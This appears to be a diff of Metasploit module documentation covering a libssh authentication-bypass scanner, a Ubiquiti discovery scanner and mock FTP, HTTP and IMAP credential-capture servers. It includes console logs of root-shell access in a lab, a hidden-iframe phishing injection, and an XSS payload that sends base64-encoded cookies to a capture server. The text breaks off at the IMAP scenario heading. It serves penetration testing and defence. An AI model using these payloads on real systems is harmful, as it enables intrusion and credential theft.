This module exploits an authentication bypass in libssh server code
where a `USERAUTH_SUCCESS` message is sent in place of the expected
`USERAUTH_REQUEST` message. libssh versions 0.6.0 through 0.7.5 and
0.8.0 through 0.8.3 are vulnerable.
Note that this module's success depends on whether the server code
can trigger the correct (`shell`/`exec`) callbacks despite only the state
machine's authenticated state being set.
Therefore, you may or may not get a shell if the server requires
additional code paths to be followed.
## Setup
1. `git clone git://git.libssh.org/projects/libssh.git`
2. `cd libssh` and `git checkout libssh-0.8.3`
3. `git apply -p1 /path/to/metasploit-framework/external/source/libssh/ssh_server_fork.patch`
4. Follow the steps in `INSTALL` to build libssh
5. Run `build/examples/ssh_server_fork` (I like to `strace` it)
## Actions
```
Name Description
---- -----------
Execute Execute a command
Shell Spawn a shell
```
## Options
**CMD**
Set this to a command or shell you want to execute. An `exec` channel
request will be sent instead of a `shell` channel request.
**SPAWN_PTY**
Enable this if you would like a PTY. Some server implementations may
require this. Note that you WILL be logged in `utmp`, `wtmp`, and
`lastlog` in most cases.
**CHECK_BANNER**
This is a banner check for libssh. It's not sophisticated, and the
banner may be changed, but it may prevent false positives due to how the
OOB authentication packet always returns `true`.
## Usage
Positive testing against unpatched libssh 0.8.3:
```
msf5 > use auxiliary/scanner/ssh/libssh_auth_bypass
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts 172.28.128.3
rhosts => 172.28.128.3
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 2222
rport => 2222
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set spawn_pty true
spawn_pty => true
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set verbose true
verbose => true
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[*] 172.28.128.3:2222 - Attempting authentication bypass
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
[*] Command shell session 1 opened (172.28.128.1:56981 -> 172.28.128.3:2222) at 2018-10-19 12:38:24 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions -1
[*] Starting interaction with 1...
# id
id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
uname -a
Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
# tty
tty
/dev/pts/1
#
```
Positive testing of shell commands using the `Execute` action:
```
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set action Execute
action => Execute
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set cmd id; uname -a
cmd => id; uname -a
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[*] 172.28.128.3:2222 - Attempting authentication bypass
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
[*] 172.28.128.3:2222 - Executed: id; uname -a
uid=0(root) gid=0(root) groups=0(root)
Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >
```
Negative testing against patched libssh 0.8.4:
```
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[*] 172.28.128.3:2222 - Attempting authentication bypass
[-] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.4 appears to be patched
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >
```
Negative testing against an insufficiently implemented libssh server:
```
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[*] 172.28.128.3:2222 - Attempting authentication bypass
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
[-] 172.28.128.3:2222 - Net::SSH::ChannelOpenFailed: Session channel open failed (1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[*] 172.28.128.3:2222 - Attempting authentication bypass
[+] 172.28.128.3:2222 - SSH-2.0-libssh_0.8.3 appears to be unpatched
[-] 172.28.128.3:2222 - Net::SSH::ChannelRequestFailed: Shell/exec channel request failed
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >
```
Negative testing against OpenSSH:
```
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > set rport 22
rport => 22
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[*] 172.28.128.3:22 - Attempting authentication bypass
[-] 172.28.128.3:22 - SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4 does not appear to be libssh
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/libssh_auth_bypass) >
```
Confirming auth is still normally present using the OpenSSH client:
```
wvu@kharak:~$ ssh -vp 2222 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null myuser@172.28.128.3
[snip]
debug1: Authentications that can continue: password
debug1: Next authentication method: password
myuser@172.28.128.3's password: wrongpassword
debug1: Authentications that can continue: password
Permission denied, please try again.
myuser@172.28.128.3's password: mypassword
debug1: Authentication succeeded (password).
Authenticated to 172.28.128.3 ([172.28.128.3]:2222).
[snip]
#
```

21
documentation/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.md Normal file
View File

@ -0,0 +1,21 @@
## Vulnerable Application
Many devices produced by Ubiquiti are affected by this issue.
## Verification Steps
1. Locate a network known or suspected to house Ubiquiti devices
2. Start msfconsole
3. Do: `use auxiliary/scanner/ubiquiti_discovery`
4. Do: `set RHOSTS <some_targets>`
5. Do: `run`
## Scenarios
An example run against a Ubiquiti EdgeRouter-X:
```
msf5 auxiliary(scanner/ubiquiti/ubiquiti_discover) > run
[+] 192.168.1.1:10001 Ubiquiti Discovery metadata: {"ips"=>["192.168.0.1", "192.168.1.1"], "macs"=>["80:2a:a8:df:aa:bb", "f8:1e:df:f8:aa:bb"], "name"=>"ubnt", "model_short"=>"ER-X", "firmware"=>"EdgeRouter.ER-e50.v1.9.7+hotfix.4.5024279.171006.0255"}
```

170
documentation/modules/auxiliary/server/capture/ftp.md Normal file
View File

@ -0,0 +1,170 @@
This module creates a mock FTP server which accepts credentials before throwing a `500` error.
## Verification Steps
1. Start msfconsole
2. Do: ```use auxiliary/server/capture/ftp```
3. Do: ```run```
## Options
**BANNER**
The Banner which should be displayed (200 server message). Default is `FTP Server Ready`.
Some notable banners to emulate:
* `Microsoft FTP Service`
* `ucftpd FTP server ready.`
* `Serv-U FTP Server v6.4 for WinSock ready...`
* `Serv-U FTP Server v15.0 ready...`
* `ProFTPD 1.3.4a Server (FTP-Server)`
**SSL**
Boolean if SSL should be used, making this FTPS. FTPS is typically run on port 990. If `SSLCert` is not set, a certificate
will be automatically generated. Default is `False`.
**SSLCert**
File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
generated. Default is ``.
## Scenarios
### FTP Emulating Microsoft with Telnet Client
Server:
```
msf5 > use auxiliary/server/capture/ftp
msf5 auxiliary(server/capture/ftp) > set banner "Microsoft FTP Service"
banner => Microsoft FTP Service
msf5 auxiliary(server/capture/ftp) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/ftp) >
[*] Started service listener on 0.0.0.0:21
[*] Server started.
[+] FTP LOGIN 127.0.0.1:44526 root / SuperSecret9
```
Client:
```
root@kali:~# telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 Microsoft FTP Service
USER root
331 User name okay, need password...
PASS SuperSecret9
500 Error
```
### FTPS with Self-Signed Certificate and curl/lftp Client
Server:
```
msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
[*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
Generating a RSA private key
.................................+++++
........+++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
msf5 > cat key.pem certificate.pem > selfsigned.pem
[*] exec: cat key.pem certificate.pem > selfsigned.pem
msf5 > cat /root/metasploit-framework/selfsigned.pem
[*] exec: cat /root/metasploit-framework/selfsigned.pem
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDMboMCNpx4nk16
vx/4gPn7yzMDHh/iTm27gIQKlktxNNKo+I53Cl4vpxLTN4NHxBn47hAlLUm3cADx
j/S9P6f62/GfcKsSeuN7VZ+anRyrdcmsKKenykv3wlfRAR5z7txqiO6LPQpUwiJT
7sgVo8TYRkIIziEXarihk0w1eMKUVlFVR92HFyLaBv0Y1ftCCrZufq6QgStzwjwh
qKFaWXSE3IjYwbVJs03dF2jBVQCVXBj4BTydwYxJ9NrCnwX7BgeRzJWKV+U4akxU
unt5t3/NXJbeTNcHrcvY2CQK4kDhu37xy99jUvOxYxw+8P2HHEgmQWfzHJAJKYCX
wKsFlR53AgMBAAECggEAA0jfSADSoMmCWy+I9vgzjA0mw60PPBaggru842Ko0afU
nqxntZfwDXn0vnoM3PFUrYA9uCszHQRqr3btqsDEFS7FghdQWFqrHwcwKk7N8B9T
XzXEA9knQVLZEF2hPKGg3wFWO9x+NwBrhse2ZUqdVhBC7VtKgtLPJqF0PwOytKlq
/pYniZdkLPrGHcQ13f50vr/dlkIGQ4YaKcAFTjCOxnK7q4of+sa75hFsXVwtnz9j
nw2SEs+SHEfLUl8wPww3IvwCkqFaosagIey2NyTtHxR3lqHobaOmu1nqXkNu/oXk
bt67M3D8VOrKu2aR9sMbirnpjSj+aBSaIjso6kSCaQKBgQD+VdrjMJu3Cr4LSoZL
FV7cog0HBlp3KE910rtY+VHH6c7jo4ow5vVvfITt78/Ntrkj1jAamAV2xA9okMay
7BlL3MVx/MKeQTwEWjTWIed/7Xc5D8o/PqMC8WkIc0Uur3BprwkGTL+wBqo9PHSO
eGo3zcdpbRrL0616o/7+uWIL1QKBgQDNxQq6tBlCY9ckuoof9SmayCmcU4t4Wusx
UJWBN32X8IGVGJRCxMlfwzLUlJwOTIWSkCj6Dw8/njsehda3KgqXbzfemIqD9K+j
/EL/ktrgBmh8ajnjBJX/2O7PsmeF7gFuDjVWflcG6WpuKFapkTsbU4D6ITmLi4uH
0Ot0CMDjGwKBgQCpQrv0XKIUs/p8CzHKgENsdBBVb33/NP2EvSTfdrVdZRXB21GZ
b+tBMc5Jh0J1djhKSD4lRKzGOH7EqS0DYCsJmLhyPrPKnEFz6BCnvVKSiZfBiuef
JXFZAQ5UiFovUqRuQQWxgpxDanwbWsN7GVofHzypxemCYrJeHwwRu5ArrQKBgDpz
FjEip2osYhiUxFd/lGnbIba+JIfzi4tekJk74fke4DAx4yt0Kp+BGxc3f3ywT+Dq
AjnFvVcc4z4wVmWBE7EgboZUXkRNZPb32TAvzuyD5Xox0m+iBdm/DVcCHlX03YMd
lhkTmjTkaM8RtkxEbL2+Yoyqk2YIJYJW3gr/0YqxAoGAe95gaeyjz5IvA/Spfztt
t8Sw0PSNKhw7Th4UwYW1g38Yh/oedHjI/cwV2oegoGRe15nQGQ3IYhyB7yTtsRJI
lVcthX4E1hPRsB3DiuldwWSxJcFhlhm72p/nas/ZsIkE4mKWccj6hJFUlnGhQh+y
dUubf5UfmaGETVVd8MbMNvQ=
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDazCCAlOgAwIBAgIUDSznPwoelB25d/7v7bk+mjkDb0kwDQYJKoZIhvcNAQEL
BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xODExMDUwMjAxMDVaFw0xOTEx
MDUwMjAxMDVaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
AQUAA4IBDwAwggEKAoIBAQDMboMCNpx4nk16vx/4gPn7yzMDHh/iTm27gIQKlktx
NNKo+I53Cl4vpxLTN4NHxBn47hAlLUm3cADxj/S9P6f62/GfcKsSeuN7VZ+anRyr
dcmsKKenykv3wlfRAR5z7txqiO6LPQpUwiJT7sgVo8TYRkIIziEXarihk0w1eMKU
VlFVR92HFyLaBv0Y1ftCCrZufq6QgStzwjwhqKFaWXSE3IjYwbVJs03dF2jBVQCV
XBj4BTydwYxJ9NrCnwX7BgeRzJWKV+U4akxUunt5t3/NXJbeTNcHrcvY2CQK4kDh
u37xy99jUvOxYxw+8P2HHEgmQWfzHJAJKYCXwKsFlR53AgMBAAGjUzBRMB0GA1Ud
DgQWBBQzY/telaztoKPEd1vfKqXQ1khMWTAfBgNVHSMEGDAWgBQzY/telaztoKPE
d1vfKqXQ1khMWTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAT
ch32xF4s6X4YTg00zbhztiBGxjDDSp6ULk68E6GuxSDcB+wE/nL66urdZJTvlFZk
M26to4odpNhCnYiKIJr4eGvk/8H83yHJn4yr1O2Xy0MJ3piGt4gJm6cA9/DdOzlE
U3tE8X+lcbq4fiz8pkUOU219jiw63OCfB7N1iGMdqCkpLWbGYXH71SAWqzpPFMsA
0oBDYjN1rMBSVA5sFteZNNkidHRE7OaXCAQ20htLZe0cO1rWMO44JKEKalwJW4YZ
n9UgZH3Kq/ptE3Jw6gdj11XT1RSn5NgCutxeCEuPzUhwg3XmVL5fOASJbohQxdGb
mVuIIRbrDW/sOgu2Viis
-----END CERTIFICATE-----
msf5 > use auxiliary/server/capture/ftp
msf5 auxiliary(server/capture/ftp) > set srvport 990
srvport => 990
msf5 auxiliary(server/capture/ftp) > set ssl true
ssl => true
msf5 auxiliary(server/capture/ftp) > set sslcert /root/metasploit-framework/selfsigned.pem
sslcert => /root/metasploit-framework/selfsigned.pem
msf5 auxiliary(server/capture/ftp) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/ftp) >
[*] Started service listener on 0.0.0.0:990
[*] Server started.
[+] FTP LOGIN 127.0.0.1:33618 admin / password123
[+] FTP LOGIN 127.0.0.1:33758 admin / password4321
```
Clients:
```
root@kali:~# curl -k --ftp-ssl --user admin:password123 ftps://127.0.0.1:990
curl: (67) Access denied: 500
root@kali:~# lftp ftps://admin:password4321@127.0.0.1:990 -e "set ssl:verify-certificate no; dir;"
ls: Login failed: 500 Error
```

271
documentation/modules/auxiliary/server/capture/http_basic.md Normal file
View File

@ -0,0 +1,271 @@
This module creates a mock web server which, utilizing a HTTP 401 response, prompts the user to enter credentials for Basic Authentication.
## Verification Steps
1. Start msfconsole
2. Do: ```use auxiliary/server/capture/http_basic```
3. Do: ```run```
## Options
**REALM**
The Realm for the Basic Authentication, which may be displayed in the input box to the user.
Default is `Secure Site`.
Some notable Realms to emulate:
* `level_15 or view_access`
* `cPanel`
* `HuaweiHomeGateway`
* `Broadband Router`
**RedirectURL**
After the user enters a set of credentials, their browser will be redirected to this address. Default is ``.
**SSL**
Boolean if SSL should be used, making this HTTPS. HTTPS is typically run on port 443. If `SSLCert` is not set, a certificate
will be automatically generated. Default is `False`.
**SSLCert**
File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
generated. Default is ``.
**URIPATH**
What URI should be utilized to prompt for the Basic Authentication. For instance, you may want this to run on `/cisco` if you use
the `REALM` `level_15 or view_access`. Default is ``, which will randomly generate a URIPATH.
## Scenarios
### Cisco Emulator with wget Client
Server:
```
msf5 > use auxiliary/server/capture/http_basic
msf5 auxiliary(server/capture/http_basic) > set REALM "level_15 or view_access"
REALM => level_15 or view_access
msf5 auxiliary(server/capture/http_basic) > set uripath '/cisco'
uripath => /cisco
msf5 auxiliary(server/capture/http_basic) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/http_basic) >
[*] Using URL: http://0.0.0.0:80/cisco
[*] Local IP: http://10.1.1.1:80/cisco
[*] Server started.
[*] Sending 401 to client 127.0.0.1
[+] 127.0.0.1 - Credential collected: "cisco:cisco" => /cisco
```
Client:
```
root@kali:~# wget http://cisco:cisco@127.0.0.1:80/cisco
--2018-11-05 19:44:29-- http://cisco:*password*@127.0.0.1/cisco
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 401 Unauthorized
Authentication selected: Basic realm="level_15 or view_access"
Reusing existing connection to 127.0.0.1:80.
HTTP request sent, awaiting response... 404 Not Found
2018-11-05 19:44:29 ERROR 404: Not Found.
```
### HTTPS with Self-Signed Certificate and curl Client
Server:
```
msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
[*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
Generating a RSA private key
............+++++
.+++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
msf5 > cat key.pem certificate.pem > selfsigned.pem
[*] exec: cat key.pem certificate.pem > selfsigned.pem
msf5 > cat /root/metasploit-framework/selfsigned.pem
[*] exec: cat /root/metasploit-framework/selfsigned.pem
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCmniuSmx1h57hK
XxBCfCOfsfJatMEtsrTHFCC0GDvIIHGot8oniVKes7yK0w8GSr0LeJgH23QMf/N0
SZlF6BRc0GELAC7qPa9VJ8HPYYVbO/VaqXMy83y7YuSh6QlP/DksHt0W0rfvcM36
ypHiZ3LIbaz8VuAUyIU5Qa6G+TNvwClhQnaX3TLN0kk31pAwwuSRNvSYvmUih4HA
eN29IJyoiXH+GEjw7wBbm9dkbU1DI71zSZyO/Tfi/2SwDwaTKCucW7tUEd9ey6AU
5hB6jGpc9N7rMYqV82mLogsXGaRDWh/tt9hghGWAX3MfD7EebQqYr4vQssoisU62
ct4DtCrNAgMBAAECggEAJ8ZohnYLHJ0xjGeHPSffZTcYsPiniR45M7ElYXjLhKni
GDHPy4Jnu8UShF2AH7Nlz8A5It8LpBRDbQZI1bxiaAnCsNqZWIfjPEPia3xPVolI
uBztiENCCoXAKLq142dFyrePdexVxo46Td1f2Blz+E7eVdrzYWLBEvsQC96fndRx
8j6KT17tIhGz+9+87dwVUXiiBZTzeWRf94jofek3XWADlu6QjAd3qW944ljYyB7p
+cJGwod5xFUxRdAr12RN+VIuzyP6xUXkfBQImdT3E0nR8LWwb4FcjwrCtCNEEYqU
/CEBx8rm0qt7mBLiIjTq5+clfKKbd1XOXmGn7+7A7QKBgQDdoJl7NBcpBtLMC1kY
KK78kar+nWS5am9H/3o76+sRmQGOCjRg9TyQBmqGkxb7en/m/xZzmS0QxbLCbChj
nOgFn9owQKQ4a2FPiNHQ1BQ7F44E+B4j+1auS7VnpbzhPgyOwmZcDoRn5h+FeNwW
Xma/o+a78rp53eTzG9Hy8lFMwwKBgQDAdX8h8Us1d34a/GuFljUBe5iJNo1giqgq
X8R2BCshvQWoT2wz3YX4FRBKMZKdfwLfbRxK1bzW7BinpgoNR6NV0lor75BgQiCJ
nztUMCfDAkxwCgXZjR20OS106G/SRjRgLtYkdDhmfynyy2MSAKhmVaLxBa57VlXD
ZE2G4jdxLwKBgQCu1oReGnDu77AaQhWOJoItQ+lmpdoRH/McFGJkpS+zmUYNvOUn
XC/j2vvsoFswFqqSG8ild0CDC8OC93pBY0XzMfEZwdULoUKKUQBcwwIWv/VM3ERC
1IPESnuYgbpo4t9bO+cuVlGD+ZoCXJ8bkmtyYaWjvc/4VeHJG7hb9WfHqwKBgAe5
L17nVgNRRkhC9PWpb3sdwKNRAx9qsRDyQuoRhMGX2lBEz6zNKQEppzuy/ZVAcZcR
w97k8O0XEG455ZFe3JknFeNJe9vBC5k6QKFCRXY382VToaR3W0fOO5rDcSlZE+UA
PCu+Vj0WwVIzA0jHqfphWWaeub/NWSe8MLhG/76VAoGBALTnftXB/b45xkgNEIZ3
7WOsfvGo23tlXSQdCNNOn6YKptqYX88jeihcKEvGoIBH+LfV/GfD2P1d227kHyBZ
FoZ+2dUwVXO2UP5j3WlxBleOqk0rTbIri/Pj4oCajAR4pXDIviUD+bUFojyFaysj
It3LYabipjgG3NjDxYBMyJnt
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDazCCAlOgAwIBAgIUXlRMetgIkrPIiamQGIBKbcEuT1IwDQYJKoZIhvcNAQEL
BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xODExMDYwMDQ2NDFaFw0xOTEx
MDYwMDQ2NDFaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
AQUAA4IBDwAwggEKAoIBAQCmniuSmx1h57hKXxBCfCOfsfJatMEtsrTHFCC0GDvI
IHGot8oniVKes7yK0w8GSr0LeJgH23QMf/N0SZlF6BRc0GELAC7qPa9VJ8HPYYVb
O/VaqXMy83y7YuSh6QlP/DksHt0W0rfvcM36ypHiZ3LIbaz8VuAUyIU5Qa6G+TNv
wClhQnaX3TLN0kk31pAwwuSRNvSYvmUih4HAeN29IJyoiXH+GEjw7wBbm9dkbU1D
I71zSZyO/Tfi/2SwDwaTKCucW7tUEd9ey6AU5hB6jGpc9N7rMYqV82mLogsXGaRD
Wh/tt9hghGWAX3MfD7EebQqYr4vQssoisU62ct4DtCrNAgMBAAGjUzBRMB0GA1Ud
DgQWBBR+MfL8LopA4OaIRLGK1gof3u+PIDAfBgNVHSMEGDAWgBR+MfL8LopA4OaI
RLGK1gof3u+PIDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBe
IGmZr3wlO32b25qj/4qB7ewukwF6uaS4OQh4VLlUk8uYsqoGfvehAaNNJsu1oKO5
XpShHeyEkpwzgx0mdCmQSB3JKseFYuZTgP9GP00EXuHYl2V+quPFN17fq0AgYN6K
TFDwzYbhWyFGz7k++i23w0/dwvL2dLH+bgdHYU49rhlZIAu7PgbyIuhP+M2ltcjt
NDO8po38u2ba52E56abfg0ZlFBqsua2s1TPHIyQ9iovTPMg1E5UTTGebaN6/BaMh
Oj6N43ld9EONST6BhP3v1buoWHi1FMouocrUkUDuahiHoLlK4ERSUrb4uNnwko24
WdNCCmA8APA1qf2BYVqs
-----END CERTIFICATE-----
msf5 > use auxiliary/server/capture/http_basic
msf5 auxiliary(server/capture/http_basic) > set ssl true
ssl => true
msf5 auxiliary(server/capture/http_basic) > set srvport 443
srvport => 443
msf5 auxiliary(server/capture/http_basic) > set sslcert /root/metasploit-framework/selfsigned.pem
sslcert => /root/metasploit-framework/selfsigned.pem
msf5 auxiliary(server/capture/http_basic) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/http_basic) >
[*] Using URL: https://0.0.0.0:443/4w0tML
[*] Local IP: https://192.168.2.117:443/4w0tML
[*] Server started.
[+] 127.0.0.1 - Credential collected: "admin:password123" => /4w0tML
```
Clients:
```
root@kali:~# curl -k --user admin:password123 https://127.0.0.1/4w0tML
&lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
&lt;html>&lt;head>
&lt;title>404 Not Found&lt;/title>
&lt;/head>&lt;body>
&lt;h1>Not Found&lt;/h1>
&lt;p>The requested URL was not found on this server.&lt;/p>
&lt;hr>
&lt;address>Apache/2.2.9 (Unix) Server at Port 443&lt;/address>
&lt;/body>&lt;/html>
```
### HTML Injection Social Engineering
In this scenario, we're able to inject HTML (but not script) into a website. We'll inject an `iframe`
that will load our basic authentication website. This payload will pop-up a login box, with the REALM (title)
set to the website, which will hopefully trick a user into entering their credentials.
**The following scenario is a demonstration, no actual vulnerability was identified, or tested.
The HTML was simply edited in the local browser.**
HTML Payload Injected:
```html
&lt;iframe width="0" height="0" src="http://127.0.0.1/">&lt;/iframe>
```
Server:
```
msf5 > use auxiliary/server/capture/http_basic
msf5 auxiliary(server/capture/http_basic) > set uripath '/'
uripath => /
msf5 auxiliary(server/capture/http_basic) > set REALM "Wordpress.com Login"
REALM => Wordpress.com Login
msf5 auxiliary(server/capture/http_basic) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/http_basic) >
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.2.117:80/
[*] Server started.
[*] Sending 401 to client 127.0.0.1
[+] 127.0.0.1 - Credential collected: "metasploit_blog:ms08-0sK1NG!" => /
```
Client:
![Injected Payload](https://user-images.githubusercontent.com/752491/48039039-326e1880-e141-11e8-9971-d9c88081d0df.png)
### XSS Cookie Theft
In this scenario, we're able to inject JavaScript into a website. We'll first get the user's cookie, then with jQuery
pull the username from the `username` field. Because the cookie may contain fields break URI parsing (like `@`)
we use `btoa` to base64 encode the cookie. Next we'll write an `iframe`
that will silently attempt a login to our basic authentication website.
**The following scenario is a demonstration, no actual vulnerability was identified, or tested.
The HTML was simply edited in the local browser.**
Payload:
```html
&lt;script>
var cookie = document.cookie;
var username = $('#username').text();
document.write('&lt;iframe width="0" height="0" src="http://' + username + ':' + btoa(cookie) + '@127.0.0.1/">&lt;/iframe>');
&lt;/script>
```
Sever:
```
msf5 > use auxiliary/server/capture/http_basic
msf5 auxiliary(server/capture/http_basic) > set uripath '/'
uripath => /
msf5 auxiliary(server/capture/http_basic) > set REALM "Login"
REALM => Login
msf5 auxiliary(server/capture/http_basic) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/http_basic) >
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.2.117:80/
[*] Server started.
[*] Sending 401 to client 127.0.0.1
[+] 127.0.0.1 - Credential collected: "h00die:R1VDPUFRRUJBUUZicVNGY2owSWVBQVJuJnM9QVFBQUFFUmFpakN4Jmc9VzZmYkdROyB1Y3M9bG5jdD0xNTM3NzI3MjQ4OyBjbXA9dD0xNTQxNDY4ODQ1Jmo9MDsgZmxhc2hfZW5hYmxlZD0wOyBhcGVhZj10ZC1hcHBsZXQtc3RyZWFtPSU3QiUyMnRtcGwlMjIlM0ElMjJpdGVtcyUyMiUyQyUyMmx2JTIyJTNBMTU0MTQ3MDY0NjI4OCU3RDsgSFA9MTsgQj1jN2tvYTYxZDY5dHBzJmI9MyZzPTVy" => /
```
Decoding the cookie:
```
msf5 auxiliary(server/capture/http_basic) > irb
[*] Starting IRB shell...
[*] You are in auxiliary/server/capture/http_basic
>> Base64.decode64('R1VDPUFRRUJBUUZicVNGY2owSWVBQVJuJnM9QVFBQUFFUmFpakN4Jmc9VzZmYkdROyB1Y3M9bG5jdD0xNTM3NzI3MjQ4OyBjbXA9dD0xNTQxNDY4ODQ1Jmo9MDsgZmxhc2hfZW5hYmxlZD0wOyBhcGVhZj10ZC1hcHBsZXQtc3RyZWFtPSU3QiUyMnRtcGwlMjIlM0ElMjJpdGVtcyUyMiUyQyUyMmx2JTIyJTNBMTU0MTQ3MDY0NjI4OCU3RDsgSFA9MTsgQj1jN2tvYTYxZDY5dHBzJmI9MyZzPTVy')
=> "GUC=AQEBAAFbqSFcj0IeBARn&s=AQADAERaieCx&g=W2fb9Q; ucs=lnct=1537714242; cmp=t=1247468145&j=0; flash_enabled=0; apeaf=td-applet-stream=%7B%22tmpl%22%3A%22items%22%2C%22lv%22%3A1541470698788%7D; HP=1; B=c7koa55d69tbs&b=3&s=5r"
```

174
documentation/modules/auxiliary/server/capture/imap.md Normal file
View File

@ -0,0 +1,174 @@
This module creates a mock IMAP server which accepts credentials.
## Verification Steps
1. Start msfconsole
2. Do: ```use auxiliary/server/capture/imap```
3. Do: ```run```
## Options
**BANNER**
The Banner which should be displayed. Default is `IMAP4`.
Some notable banners to emulate:
* `Dovecot ready.`
* `IMAP 4 Server (IMail 9.23)`
* `mailserver Cyrus IMAP4 v2.2.13-Debian-2.2.13-19 server ready`
* `Welcome to Binc IMAP v1.3.4 Copyright (C) 2002-2005 Andreas Aardal Hanssen at 2018-11-08 11:17:35 +1100`
* `The Microsoft Exchange IMAP4 service is ready.`
* `Microsoft Exchange Server 2003 IMAP4rev1 server versino 6.5.7638.1 (domain.local) ready.`
**SSL**
Boolean if SSL should be used, making this Secure IMAP. Secure IMAP is typically run on port 993. If `SSLCert` is not set, a certificate
will be automatically generated. Default is `False`.
**SSLCert**
File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
generated. Default is ``.
## Scenarios
### IMAP Emulating Microsoft Exchange with Telnet Client
